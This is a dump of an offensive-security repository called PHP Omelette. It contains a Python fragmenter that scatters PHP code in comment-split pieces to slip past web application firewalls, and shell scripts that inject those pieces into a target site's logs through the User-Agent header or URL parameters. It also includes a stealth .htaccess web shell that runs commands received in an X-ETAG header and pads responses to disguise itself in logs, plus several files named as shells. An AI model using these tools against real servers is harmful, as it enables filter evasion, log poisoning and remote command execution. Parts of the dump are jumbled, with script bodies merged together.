├── .gitignore
├── README.md
├── injectUA.sh
├── injectlog.sh
├── omelette
├── plate
├── t
├── .htaccess
├── backtick.php
├── ccc.php
├── ccc2.php
├── condensed.php
├── condensed2.php
├── index.php
├── php_parse.php
├── shell1.php
├── shell2.php
├── shell3.php
├── shell4.php
├── sht-plain.php
├── sht.php
├── t1.php
├── t2.php
├── t3.php
├── test.js
└── test.php
└── view-clean.sh
/.gitignore:
--------------------------------------------------------------------------------
1 | plate
2 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | PHP OMELETTE
2 | ===============================================================================
3 | A code fragmentation technique for avoiding filtering or detection from things
4 | like web application firewalls. Inspired by the concept of fragmented shellcode
5 | used in memory corruption [omelet][1] and can scatter fragmented PHP code
6 | through log files yet still execute it as a single bit of PHP.
7 |
8 | The broad concept is:
9 | 1. Everything inside the `` tags is code
10 | 2. Everything inside the `/*` `*/` multi line comments are ignored
11 | 3. PHP parsing has some flexibility
12 |
13 | The preferred use of this is to inject a small stager payload, but bigger files
14 | could be transformed as well.
15 |
16 | The steps are simple enough that they can be performed manually:
17 | 1. Add comment after all opening tags
18 | 2. Add comment before all closing tags
19 | 3. Add comments before and after semi colons
20 | 4. Add comment after comma
21 | 5. Add comments before and after opening and closing pharanteses
22 | 6. Remove duplicate comments
23 | 7. Insert new line before each closing multi line comment
24 | 8. Remove empty lines
25 |
26 | More steps can be added, or you can implement your own version, but keeping
27 | them simple means you can use the steps on other languages like JavaScript as
28 | well.
29 |
30 | This repository includes some scripts to help automate the process of
31 | fragmenting and injecting the code, and some "debugging" tools. The automated
32 | process is not syntax aware so beware when using strings or embedding PHP in
33 | things like HTML.
34 |
35 | omelette
36 | -------------------------------------------------------------------------------
37 | The main script for fragmenting PHP code, uses regex to generate fragmented PHP
38 | code. Code is given as the first agrument. Examples:
39 |
40 | ```bash
41 | $ ./omelette ''
42 | $ ./omelette "$(cat t/shell3.php)" > plate
43 | ```
44 |
45 | injectlog.sh and injectUA.sh
46 | -------------------------------------------------------------------------------
47 | Automatically fragment and inject the omelette to a website. Takes PHP code as
48 | first argument and a URL as the second. Will send injection as parameter or via
49 | UserAgent. Examples:
50 |
51 | ```bash
52 | $ ./injectlog.sh '' 'http://example.com?id=1&inject='
53 | $ ./injectUA.sh "$(cat t/shell1.php)" http://example.com
54 | ```
55 | view-clean.sh
56 | -------------------------------------------------------------------------------
57 | Tries to show the fragmented code in a cleaner/readable format. Example:
58 |
59 | ```
60 | ./view-clean.sh ./plate
61 | ```
62 |
63 | php_parse.php
64 | -------------------------------------------------------------------------------
65 | Breaks PHP code into parsed tokens, handy when seeing how the PHP parser deals
66 | with fragmented code:
67 |
68 | ```
69 | php php_parse.php ./file
70 | ```
71 |
72 | Credits
73 | ===============================================================================
74 | Wireghoul - http://www.justanotherhacker.com
75 |
76 | References:
77 | [1]: "Eggs to omelet"
78 |
--------------------------------------------------------------------------------
/injectUA.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | code=$1
4 | ./omelette "${code}" > plate
5 | echo [*] Scrambling code
6 | echo [*] Checking code
7 | php -l plate >/dev/null 2>&1
8 |
9 | if [ $? != 0 ]; then
10 | echo "Scrambling PHP returned broken code in file 'plate'"
11 | exit 2;
12 | fi
13 |
14 | echo [*] Injecting code via User Agent
15 | while read -r line; do
16 | echo -n " | ${line} \t>> $2 => "
17 | curl -k -s -i -A "Omelette/1.0 (${line})" "$2" | head -1
18 | done plate
5 | echo [*] Scrambling code
6 | echo [*] Checking code
7 | php -l plate >/dev/null 2>&1
8 |
9 | if [ $? != 0 ]; then
10 | echo "Scrambling PHP returned broken code in file 'plate'"
11 | exit 2;
12 | fi
13 |
14 | echo [*] Injecting code by appending to URL
15 | while read -r line; do
16 | p=`php -r "print urlencode('${line}');"`
17 | echo -n " | ${line}\t>> $2${p} => "
18 | curl -k -s -i -A "Omelette/1.0" "$2${p}" | head -1
19 | done>> >>> /**/?>
42 | et = re.compile('(\?>)')
43 | code = et.sub(r'/**/\1', code)
44 |
45 | # Add comment around semi colon
46 | # ; >>> /**/;/**/
47 | sc = re.compile('(\;)')
48 | code = sc.sub(r'/**/\1/**/', code)
49 |
50 | # Add comment after comma
51 | cm = re.compile('(\,)')
52 | code = cm.sub(r'\1/**/', code)
53 |
54 | # Before and after ( )
55 | pt = re.compile('(\(|\))')
56 | code = pt.sub(r'/**/\1/**/', code)
57 |
58 | # Future additions? ( \"|\" |\[|\]) ?
59 |
60 | # Remove dupe comments
61 | dp = re.compile('(/\*\*/ */\*\*/)')
62 | code = dp.sub(r'/**/', code)
63 |
64 | # Insert newlines
65 | nl = re.compile('(\*/)')
66 | code = nl.sub(r'\n\1', code)
67 |
68 | # Strip empty lines
69 | bl = re.compile('(\n\s*\n)')
70 | code = bl.sub(r'\n', code)
71 | #code = re.sub(r'\n\s*\n', '\n', code, flags=re.MULTILINE)
72 |
73 | print(code)
74 |
--------------------------------------------------------------------------------
/plate:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/t/.htaccess:
--------------------------------------------------------------------------------
1 | # Self contained .htaccess stealth web shell - Part of the htshell project
2 | # Written by Wireghoul - http://www.justanotherhacker.com
3 |
4 | # Override default deny rule to make .htaccess file accessible over web
5 |
6 | # Uncomment the line below for Apache2.4 and newer
7 | # Require all granted
8 | Order allow,deny
9 | Allow from all
10 |
11 |
12 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted
13 | # the apache directoves from the .htaccess file
14 | AddType application/x-httpd-php .htaccess
15 |
16 | # Enable output buffering so we can fudge content length in logs (see the ob_* calls)
17 | php_value output_buffering 1
18 |
19 | # Rewrite supposed url to the .htaccess file if X-ETAG request header is set
20 | RewriteEngine on
21 | RewriteCond %{HTTP:X-ETAG} !^$
22 | RewriteRule .* .htaccess [L]
23 | RewriteCond %{HTTP:X-ETAG} ^$
24 | RewriteRule .htaccess - [F]
25 |
26 | # Set $e to exec(), discard 2 byte padding on base64 encoding (breaks automated decoding), payload in X-ETAG header
27 | # Then make sure the log contains a 200 ok response with response size of 9326 (should match the file you are impersonating or a code in a 404 response)
28 | # SHELL &1", $o); header("X-ETAG: AA".base64_encode(implode("\r\n ", $o))); print str_repeat(" ", 9326); ob_flush(); exit(); ?>
29 |
--------------------------------------------------------------------------------
/t/backtick.php:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/t/ccc.php:
--------------------------------------------------------------------------------
1 |
7 |
8 |
13 |
14 |
15 | Test
16 |
17 |
24 | ...
25 |
26 |